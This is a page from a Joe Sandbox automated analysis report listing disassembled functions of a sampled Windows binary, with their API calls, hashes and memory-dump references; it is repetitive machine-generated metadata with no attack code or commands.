                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 22757656-0
                                                                                                                    • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction ID: 8a90d41b50c92e4d06614146a6bfc27181c422ceb85b6e7c9014d4731287b3ff
                                                                                                                    • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction Fuzzy Hash: A1112E71A1864987E7506F24E44837DBAB0FB89FA5FA44734D62A473D0DF3D9449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56C5
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56D9
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56FD
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859560861-0
                                                                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction ID: d047d02ab10545f19e0d7d112ef87390b93682f133160d4cbe0b4f02ebfff3d0
                                                                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction Fuzzy Hash: CA11EC72A04B95CADB009F56E4440ADBBB0F75DF85B998135DB4E03B18EF38E456C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD9158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 140117192-0
                                                                                                                    • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                    • Instruction ID: 7b9259c356e8247d4c7102b9d03b27bcd97afddc51a0e22de4df0bf58df5cce9
                                                                                                                    • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                    • Instruction Fuzzy Hash: E621E735909B8981EB40AF44F884369BBB4FB84F56FA00135DA8D43B64EF7DE448C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE64
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3874763886-0
                                                                                                                    • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                    • Instruction ID: 93bd9967961ae498392f02c231caa2ae154bb390240f73a08be53760b780a47c
                                                                                                                    • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                    • Instruction Fuzzy Hash: D6F0FF61B15B4A87EF54AF659408178EDE1FF8EF92BA89434CD0E46390FE3CA444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1606018815-0
                                                                                                                    • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction ID: 2a60d51aa00c3d334817cc2f7f6f41368badf87669877e9b166c541aade4c68c
                                                                                                                    • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction Fuzzy Hash: E5F0F231A24A82CBD6046F10E844279BE70FB8AF43F95A228DA0A02394EF3CD008CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                      • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    • wcschr.MSVCRT ref: 00007FF789BF11DC
                                                                                                                    • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF789BE827A), ref: 00007FF789BF1277
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocateProcessmemmovewcschr
                                                                                                                    • String ID: &()[]{}^=;!%'+,`~
                                                                                                                    • API String ID: 4220614737-381716982
                                                                                                                    • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                    • Instruction ID: 240b9367e5877c88ed8d5c4f170839325144dc0fa7160fc2a4b7a6c3da17ec5f
                                                                                                                    • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                    • Instruction Fuzzy Hash: 1371E871B0828686EB60EF56E440679FAF4FB94F9AFA00635C94D83B90DF3DA541CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    • longjmp.MSVCRT ref: 00007FF789BDCCBC
                                                                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDCCE0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 3282654869-1994581435
                                                                                                                    • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                    • Instruction ID: 2a65669840159072e08c2a0276c4a970bf1e2ef61dbc760cff059c984aba67b0
                                                                                                                    • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                    • Instruction Fuzzy Hash: 8F61C061A0964AC2FA54BF21D454179AAB0BF44FAAFF84534DA1E077E1EE3DF940C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memmovewcsncmp
                                                                                                                    • String ID: 0123456789
                                                                                                                    • API String ID: 3879766669-2793719750
                                                                                                                    • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                    • Instruction ID: 24b95796633e5d1fa29b0b4f7cafcfad5154dc5552ce79017e6e532e1ec17f80
                                                                                                                    • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                    • Instruction Fuzzy Hash: 2B41D522B1878E85EA64AF2994046BAABB4FB44F81FA49131DE4E43794FE3CD441C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE97D0
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE98D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                    • String ID: Software\Classes
                                                                                                                    • API String ID: 2714550308-1656466771
                                                                                                                    • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                    • Instruction ID: 91f006a9209554163dd88b751647980732440737407261108dc13317130dc60d
                                                                                                                    • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                    • Instruction Fuzzy Hash: 3E417F22A0975E81EA04EF56D45903DABB8FB84FD1FA08131DE5E477E1EE39E846C350
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEA0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEA0FC
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEA1FB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                    • String ID: Software\Classes
                                                                                                                    • API String ID: 2714550308-1656466771
                                                                                                                    • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                    • Instruction ID: 2ea2bddf2b0a007a61f861c7e841e9c847c2ec7c182b30e69adf9dbd8d7395f5
                                                                                                                    • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                    • Instruction Fuzzy Hash: 22418F22A09B5A81EA00EF16D44443DABBCFB85FD1FA08131DE5E477E1EE39E946C350
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitle
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3358957663-3695764949
                                                                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction ID: 646374a0ed368522b8caf40984f5b25c294191b618e7bb202494354d1578c4da
                                                                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction Fuzzy Hash: 80319021A0964A82EA44BF52A844078EEB4FF49FE6FA45535DE1E077D5DF3CE841C324
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
